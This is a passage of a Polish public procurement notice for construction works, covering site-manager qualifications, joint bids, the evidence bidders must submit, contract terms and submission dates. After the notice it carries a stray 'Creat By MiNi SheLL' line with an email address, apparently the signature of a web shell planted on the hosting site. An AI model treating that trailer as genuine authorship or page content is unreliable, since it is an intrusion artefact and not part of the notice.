osobę posiadającą uprawnienia do kierowania robotami budowlanymi<br/>w specjalności konstrukcyjno-budowlanej bez ograniczeń, która będzie pełnić funkcję<br/>kierownika budowy/kierownika robót;<br/>Osoba ta musi spełniać następujące wymagania:<br/>- posiadać uprawnienia do pełnienia samodzielnych funkcji technicznych<br/>w budownictwie do kierowania robotami budowlanymi bez ograniczeń w branży<br/>konstrukcyjno-budowlanej zgodnie z Ustawą z dnia 7 lipca 1994<br/>r. – Prawo Budowlane (tj. Dz.U.2021.2351 ze zm.) oraz zgodnie z Rozporządzeniem<br/>Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r w sprawie przygotowania<br/>zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie<br/>(Dz. U. z 2019 r. poz. 831) oraz być zrzeszoną we właściwym samorządzie<br/>zawodowym zgodnie z przepisami Ustawy z dnia 15 grudnia 2000 r. o samorządach<br/>zawodowych architektów oraz inżynierów budownictwa (tj. Dz.U. 2022.1557ze zm.) i<br/>opłacać składki z tytułu obowiązującego ubezpieczenia od odpowiedzialności<br/>cywilnej, lub<br/>- spełniać warunki, o których mowa w art. 12a ustawy Prawo budowlane, tj. być osobą<br/>której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w<br/>przepisach odrębnych lub spełniającą wymogi, o których mowa w art. 20a Ustawy o<br/>samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie<br/>usług transgranicznych”). Regulację odrębną stanowią przepisy ustawy z dnia 22<br/>grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej (t. j. Dz.U.2022.1616) oraz być zrzeszoną<br/>we właściwym samorządzie zawodowym zgodnie z przepisami Ustawy o<br/>14<br/>samorządach zawodowych architektów oraz inżynierów budownictwa i opłacać<br/>składki z tytułu obowiązującego ubezpieczenia od odpowiedzialności cywilnej,<br/>W przypadku podmiotów występujących wspólnie warunek ten musi być<br/>spełniony przez co najmniej jednego z Wykonawców.<br/>Przed podpisaniem umowy Wykonawca jest zobowiązany przedstawić ww.<br/>dokumenty lub kserokopie dokumentów poświadczonych za zgodność z<br/>oryginałem.<br/>UWAGA: Ilekroć Zamawiający wymaga określonych uprawnień do pełnienia<br/>samodzielnych funkcji technicznych w budownictwie na podstawie aktualnie<br/>obowiązującej ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz.U.2021.2351 ze<br/>zm.) oraz rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r.<br/>w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji<br/>technicznych w budownictwie, rozumie przez to również odpowiadające im ważne<br/>uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów<br/>prawa lub odpowiednich przepisów obowiązujących na terenie kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ<br/>zgodnie z ustawą o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej.<br/>2. Postanowienia uzupełniające<br/>1) Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne<br/>przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>2) Sposób spełniania warunków udziału w postępowaniu przez wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia .<br/>a) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>b) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>oświadczenie (Załącznik Nr 2 do SWZ) składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z<br/>wykonawców wykazuje spełnianie warunków.<br/>c) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z<br/>postępowania składa każdy z Wykonawców wspólnie ubiegający się o zamówienie.<br/>d) Przedsiębiorcy prowadzący działalność w formie spółki cywilnej traktowani są jak<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. Wykonawcy ci<br/>zobowiązani są dołączyć do oferty oświadczenie, o którym mowa w ppkt 2 (Załącznik<br/>Nr 2 do SWZ).<br/>3. Warunki jakie musi spełnić Wykonawca polegający na zasobach innych podmiotów:<br/>a) Wykonawca może w celu potwierdzenia spełniania warunków udziału w<br/>postępowaniu polegać na zdolnościach technicznych lub zawodowych<br/>podmiotów udostępniających zasoby, niezależnie od charakteru prawnego<br/>łączących go z nimi stosunków prawnych.<br/>15<br/>b) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach<br/>podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do<br/>realizacji których te zdolności są wymagane.<br/>c) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, składa wraz z ofertą, zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów<br/>na potrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów – wg treści załącznika nr<br/>8 do SWZ, podpisanego przez podmiot trzeci, udostepniający zasoby.<br/>d) Zamawiający oceni, czy udostępniane wykonawcy przez podmioty<br/>udostępniające zasoby zdolności techniczne lub zawodowe, pozwalają na<br/>wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu, a<br/>także zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia,<br/>które zostały przewidziane względem Wykonawcy.<br/>e) Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby<br/>nie potwierdzają spełniania przez Wykonawcę warunków udziału w<br/>postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia,<br/>Zamawiający żąda, aby Wykonawca w terminie określonym przez<br/>Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo<br/>wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>UWAGA! Wykonawca nie może, po upływie terminu składania ofert, powoływać się na<br/>zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert<br/>nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wykaz podmiotowych środków dowodowych (oświadczeń lub dokumentów),<br/>składanych przez Wykonawcę w celu potwierdzenia, że nie podlega on wykluczeniu oraz<br/>spełnia warunki udziału w postępowaniu:<br/>1) Oświadczenie Wykonawcy składane na podstawie art. 125 ust. 1 ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych o niepodleganiu wykluczeniu i spełnianiu<br/>warunków udziału w postępowaniu. Wzór oświadczenia stanowi Załącznik Nr 2 do SWZ.<br/>UWAGA! WYKONAWCA POWYŻSZE OŚWIADCZENIE DOŁĄCZA DO OFERTY.<br/>2. Wykaz podmiotowych środków dowodowych (oświadczeń lub dokumentów)<br/>składanych przez Wykonawcę w celu potwierdzenia braku podstaw do wykluczenia:<br/>1) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.<br/>2)oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku<br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007<br/>r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275 ze zm.), z innym<br/>wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej<br/>grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie<br/>16<br/>oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – wzór<br/>oświadczenia stanowi - Załącznik nr 5 do SWZ;<br/>a) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami<br/>Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych wyżej, – składa<br/>dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub<br/>miejsce zamieszkania, potwierdzające, że:<br/>b) nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na<br/>ubezpieczenie społeczne lub zdrowotne,<br/>c)nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator<br/>lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona<br/>ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury<br/>przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>4) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce<br/>zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których<br/>mowa powyżej, zastępuje się je odpowiednio w całości lub w części dokumentem<br/>zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć,<br/>złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem<br/>sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub<br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w<br/>postępowaniu, dotyczących sytuacji ekonomicznej lub finansowej<br/>Zamawiający żąda:<br/>a) dokumentów potwierdzających, że Wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej<br/>tego ubezpieczenia oraz dowodu opłacenia składki, wg stanu na dzień<br/>składania oferty.<br/>2) W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w<br/>postępowaniu dotyczących zdolności technicznej lub zawodowej,<br/>Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o<br/>dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te<br/>zostały wykonane, z załączeniem dowodów określających czy te roboty<br/>budowlane zostały wykonane należycie, w szczególności informacji o tym<br/>czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i<br/>prawidłowo ukończone, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty wystawione przez podmiot, na rzecz<br/>którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej<br/>przyczyny o obiektywnym charakterze wykonawca nie jest w stanie<br/>uzyskać tych dokumentów – inne dokumenty (Załącznik nr 3 do SWZ).<br/>b) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia<br/>publicznego – w zakresie o jakim mowa w pkt XV ust. 1 pkt 4b, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>17<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami zgodnego ze<br/>wzorem stanowiącym Załącznik nr 4 do SWZ<br/>4. Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio<br/>podmiotowe środki dowodowe nie są już aktualne, Zamawiający może w każdym<br/>czasie wezwać Wykonawcę do złożenia wszystkich lub niektórych podmiotowych<br/>środków dowodowych, aktualnych na dzień ich złożenia.<br/>5. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych,<br/>jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w<br/>szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r.<br/>o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile<br/>wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy,<br/>dane umożliwiające dostęp do tych środków.<br/>6. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków<br/>dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki<br/>oraz potwierdzi ich prawidłowość i aktualność.<br/>7. Jeżeli Wykonawca nie złożył oświadczenia, o którym mowa w art. 125 ust. 1<br/>ustawy, podmiotowych środków dowodowych, innych dokumentów lub<br/>oświadczeń składanych w postępowaniu lub są one niekompletne lub zawierają<br/>błędy, Zamawiający wzywa Wykonawcę odpowiednio do ich złożenia,<br/>poprawienia lub uzupełnienia w wyznaczonym terminie, chyba że:<br/>a) oferta wykonawcy podlegają odrzuceniu bez względu na ich złożenie,<br/>uzupełnienie lub poprawienie lub<br/>b) zachodzą przesłanki unieważnienia postępowania.<br/>8. Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści<br/>oświadczenia, o którym mowa w art.125 ust.1 ustawy, lub złożonych<br/>podmiotowych środków dowodowych lub innych dokumentów lub oświadczeń<br/>składanych w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedstawienia przedmiotowych środków dowodowych przez Wykonawcę. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający wymaga, aby w przypadku powierzenia<br/>części zamówienia Podwykonawcom, Wykonawca wskazał w ofercie części zamówienia,<br/>których wykonanie zamierza powierzyć Podwykonawcom oraz podał (o ile są mu wiadome<br/>na tym etapie) nazwy/firmy Podwykonawców- Załącznik nr 6 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> a) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>b) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>oświadczenie (Załącznik Nr 2 do SWZ) składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z<br/>wykonawców wykazuje spełnianie warunków.<br/>c) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z<br/>postępowania składa każdy z Wykonawców wspólnie ubiegający się o zamówienie.<br/>d) Przedsiębiorcy prowadzący działalność w formie spółki cywilnej traktowani są jak<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. Wykonawcy ci<br/>zobowiązani są dołączyć do oferty oświadczenie, o którym mowa w ppkt 2 (Załącznik<br/>Nr 2 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami zał. nr 7 do SWZ - wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-22 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma eZamówienia pod adresem: https://ezamowienia.gov.pl. Wykonawca przygotowuje ofertę przy pomocy interaktywnego &#34;Formularza ofertowego&#34; udostępnionego przez Zamawiającego na Platformie eZamówienia i zamieszczonego w podglądzie postępowania w zakładce &#34;Informacje podstawowe&#34;. Sposób złożenia oferty opisany na stronie https://ezamowienia.gov.pl/pl/komponent-edukacyjny.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-22 13:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W związku ze zmianami po stronie Profilu Zaufanego od dnia 10 maja 2024 r. nie ma możliwości podpisywania Podpisem Zaufanym interaktywnego formularza ofertowego, tak jak do tej pory. Aby podpisać formularz ofertowy pobrany z Platformy e-Zamówienia należy po pobraniu i wypełnieniu formularza zapisać go w wersji nieedytowalnej i następnie podpisać Podpisem Zaufanym.<br/><br/>W razie problemów z Podpisem Zaufanym uprzejmie prosimy o kontakt z ePUAPem:<br/><br/>telefon: + 48 (42) 253 54 50 (czynny od poniedziałku do piątku w godzinach: 7:00 – 18:00)<br/>e-mail: pz-pomoc@coi.gov.pl lub epuap-pomoc@coi.gov.pl<br/><br/>W sprawach związanych z formularzem ofertowym uprzejmie prosimy o kontakt z Infolinią Platformy e-Zamówienia:<br/><br/>telefon: + 48 (22) 458 77 99 (czynny od poniedziałku do piątku w godzinach: 08:15-16:15).

Creat By MiNi SheLL
Email: jattceo@gmail.com